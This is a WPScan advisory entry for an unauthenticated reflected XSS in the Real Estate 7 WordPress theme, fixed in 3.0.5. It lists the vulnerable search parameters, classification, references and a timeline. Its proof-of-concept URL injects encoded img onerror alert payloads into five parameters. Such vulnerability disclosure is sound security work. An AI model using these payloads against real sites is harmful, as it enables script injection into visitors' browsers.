WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

Themes Vulnerabilities

Real Estate 7 < 3.0.5 - Unauthenticated Reflected XSS

Description

An Unauthenticated Reflected XSS vulnerability was discovered in the Real Estate 7 theme v3.0.4 for WordPress.

Vulnerable parameters: ct_sqft_from, ct_sqft_to, ct_lotsize_from, ct_lotsize_to, ct_mls.

Edit (WPScanTeam): The issue has been hot-fixed in 3.0.4. So the fixed in has been set to 3.0.5 (the next version to be released)

Proof of Concept

https:/exmple.com/?ct_sqft_from=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28%60ct_sqft_from%60%29%3E&ct_lotsize_from=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28%60ct_lotsize_from%60%29%3E&ct_lotsize_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28%60ct_lotsize_to%60%29%3E&ct_mls=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28%60ct_mls%60%29%3E&ct_sqft_to=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28%60ct_sqft_to%60%29%3E

Affects Themes

realestate-7
Fixed in version 3.0.5

References

URL
https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
URL
https://contempothemes.com/wp-real-estate-7/changelog/
URL
https://medium.com/@ex.mi/wordpress-real-estate-7-theme-v3-0-5-unauthenticated-reflected-xss-8dc8b8050acf

YouTube Video

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Ex.Mi

Submitter

Ex.Mi

Submitter website
https://ex-mi.ru
Verified

Yes

WPVDB ID
b02ae01d-d08f-4e6d-8395-0cdbb05765c1

Timeline

Publicly Published

2020-08-29 (about 2 years ago)

Added

2020-10-07 (about 2 years ago)

Last Updated

2020-10-08 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin